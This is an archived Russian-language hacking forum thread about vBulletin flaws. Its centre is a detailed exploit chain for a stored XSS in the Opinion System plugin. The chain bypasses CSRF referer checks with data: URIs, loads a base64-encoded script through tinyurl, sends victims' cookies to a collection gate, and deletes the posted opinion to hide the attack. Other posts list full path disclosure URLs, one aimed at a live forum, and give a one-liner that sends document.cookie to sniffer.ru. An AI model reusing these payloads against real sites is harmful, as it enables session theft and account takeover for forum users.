ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.12.2011, 23:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Opinion System 1.5.0
Имеется пассивноактивная? xss... после того, как оставили мнение с js при каждом переходе на страницу с мнением будет выполняться этот код, так как он подгружается в строку редактирования. У других отображен не будет. фильтр спец символов.
Для использования достаточно сформировать запрос на добавление мнения и редиректнуть его на страничку с мнениями... для отвода глаз
Дорк
Сообщение от None
vbulletin inurl: opinion . php
|
|
|
|
28.12.2011, 23:48
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от justonline
justonline said:
Для использования достаточно сформировать запрос на добавление мнения и редиректнуть его на страничку с мнениями... для отвода глаз
Не все так просто.
Приведу пример практической эксплуатации бага:
1. Добавление мнения
POST-запрос
opinion.php
do=postvote&postid= [POSTID]&comment= [COMMENT]&value=0
Защита от CSRF - проверка домена рефера. Если в заголовке вообще нет рефера, запрос тоже срабатывает.
a) [POSTID]
opinion.php?do=about&userid= [USERID]
Во время атаки код XSS некоторое время будет храниться на стене одного из пользователей.
Кто именно это будет, не имеет значения ( [USERID] - любой существующий пользователь)
b) Автоматическая отправка запроса
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Для обхода проверки рефера форма шифруется с помощью протокола data ( data:text/html;base64,[форма_отправки_запроса])
2. Отображение мнения на странице
opinion.php?do=about&userid= [USERID]
Для выполнения кода можно использовать "autofocus/onfocus="[JS].
3. Код для проведения атаки
На странице мнений для удаления есть встроенная JS-функция, она и будет использована для уничтожения следов атаки. После вызова функции удаления страница очищается, чтобы избежать зацикливания onfocus.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]myGate[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://example.com/?cookie='[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// сюда отправляются куки
[/COLOR][COLOR="#0000BB"]pBody[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getElementsByTagName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'body'[/COLOR][COLOR="#007700"])[[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]delFunc[/COLOR][COLOR="#007700"]= /[/COLOR][COLOR="#0000BB"]ChangeText[/COLOR][COLOR="#007700"]\([/COLOR][COLOR="#DD0000"]'do=delete.+?\)/.exec(pBody.innerHTML); // парсим со страницы функцию удаления мнения
pBody.innerHTML += '[/COLOR][COLOR="#007700"][/COLOR][COLOR="#DD0000"]'; // отправка данных на гейт, удаление мнения, очистка страницы
[/COLOR][/COLOR]
Мнения ограничены по длине, поэтому вышеприведенный код необходимо вынести в отдельный скрипт.
a) убираем все лишнее
Сообщение от None
g='http://example.com/?cookie=';b=document.getElementsByTagName('body')[0];b.innerHTML+='';//
шифруем в base64
Код:
Code:
Zz0naHR0cDovL2V4YW1wbGUuY29tLz9jb29raWU9JztiPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdib2R5JylbMF07Yi5pbm5lckhUTUwrPSc8aW1nIHNyYz0iJytnK2VzY2FwZShkb2N1bWVudC5jb29raWUpKycib25lcnJvcj0iJysvQ2hhbmdlVGV4dFwoJ2RvPWRlbGV0ZS4rP1wpLy5leGVjKGIuaW5uZXJIVE1MKSsnO2RvY3VtZW50LndyaXRlKFwnXCcpIj4nOy8v
c) помещаем код в короткую ссылку используя протокол data и сервис сокращения tinyurl
Код:
Code:
http://tinyurl.com/c6opgyk
d) подключаем скрипт
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]newScript[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]createElement[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'script'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]newScript[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://tinyurl.com/c6opgyk'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getElementsByTagName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'body'[/COLOR][COLOR="#007700"])[[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]appendChild[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]newScript[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
e) окончательный вариант комментария
Сообщение от None
"autofocus/onfocus="s=document.createElement('script');s.src= '//tinyurl.com/c6opgyk';document.getElementsByTagName('body')[0].appendChild(s);
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
function[/COLOR][COLOR="#0000BB"]srcReplace[/COLOR][COLOR="#007700"]()
{
var[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getElementById[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ifr'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]onload[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]i[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]src[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://site/opinion.php?do=about&userid=[USERID]'[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]
[/COLOR]
[/COLOR]
5. Полная автоматизация уязвимости
[POSTID] действует относительно недолго, поэтому все вышеописанное будет работать только для одной атаки на конкретного пользователя.
Чтобы полностью все автоматизировать, придется парсить http://site/opinion.php?do=about&userid= [USERID] и динамически генерировать код из пункта 5 на своем сервере, например PHP-скриптом.
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
p.s.:
Заставить все это работать кроссбраузерно - задача тоже относительно непростая.
Описывать специфику работы различных браузеров с data и другие варианты скрытия реферера здесь не буду, потому что получится слишком много инфы для одного оффтопного сообщения.
|
|
|
29.12.2011, 16:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Сообщение от M_script
M_script said:
Не все так просто.
Приведу пример практической эксплуатации бага:
................................
мои комплименты. хорошая пища для повышения качества своих знаний, спасибо
|
|
|
|
24.01.2012, 00:43
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
Обычно (90%) в нижнем углу написано "Администрирование".
Клацните туда и попадете в админку.
|
|
|
|
24.01.2012, 23:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
2797
Репутация:
0
|
|
Сообщение от Fooog
Fooog said:
Обычно (90%) в нижнем углу написано "Администрирование".
Клацните туда и попадете в админку.
Поправлю вас, "Управление"
Сообщение от Cherep
Cherep said:
уже попытался, та нихера, видать говнари-админы тупо не сменили пути в исходнике
Может просто футер потерли, в целях безопастности.. а так, зайдите к пользователю в профиль, -> редактировать, откроеться админка (если прописана в config.php), или попробуйте выдать нарушение, откроеться модерка.. (только я не знаю, можно ли с модеркой дальше работать)
|
|
|
|
25.01.2012, 22:03
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
Сообщение от eman
eman said:
Поправлю вас, "Управление"
Может просто футер потерли, в целях безопастности.. а так, зайдите к пользователю в профиль, -> редактировать, откроеться админка (если прописана в config.php), или попробуйте выдать нарушение, откроеться модерка.. (только я не знаю, можно ли с модеркой дальше работать)
как я понял, в конфиге она не прописана Мб её вообще стерли нахер
|
|
|
|
27.01.2012, 01:10
|
|
Новичок
Регистрация: 08.02.2010
Сообщений: 1
Провел на форуме:
54835
Репутация:
0
|
|
зайдите под админом, дождитесь админа и посмотрите пути админки через "кто на сайте"
|
|
|
|
10.02.2012, 22:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
2797
Репутация:
0
|
|
vBulletin 4.1.10 Full Path Disclosure
[Info]
# Author: linc0ln.dll
# Exploit Title: vBulletin 4.1.10 Full Path Disclosure
# Date: 16/01/2012
# Vendor or Software Link: http://www.vbulletin.com/# Category: WebApp
# Version: 4.1.10
# Contact: linc@tormail.net
# Website: linc6.wordpress.com
# Greetings to: Mario_Vs | fir3 | fight3r | artii2 | pok3 | Upgreydd |VoltroN | amiugly | b00y4k4 |
[Vulnerability]
# Full Path Disclosure:
Сообщение от None
http://localhost/path/forumdisplay.php?do[]=linc0ln.dll
Сообщение от None
http://localhost/path/calendar.php?do[]=linc0ln.dll
Сообщение от None
http://localhost/path/search.php?do[]=linc0ln.dll
demo
Сообщение от None
https://forum.4game.ru/forumdisplay.php?do[]=linc0ln.dll
|
|
|
|
11.02.2012, 09:16
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от Melo
Melo said:
что дает нам это уязвимость?
Написано же "Full Path Disclosure". Раскрытие пути к скрипту на сервере.
|
|
|
|
29.02.2012, 04:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Активная XSS
Уязвимы все версий
Требуются права модератора
Идём
Панель модератора -> Управление разделами -> Объявление [ Редактировать]
Рабочий пример (проверка на работоспособность)
Эксплуатация обычная
Сообщение от None
img = new Image(); img.src = "http://sniffer.ru/s.php?"+document.cookie;
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
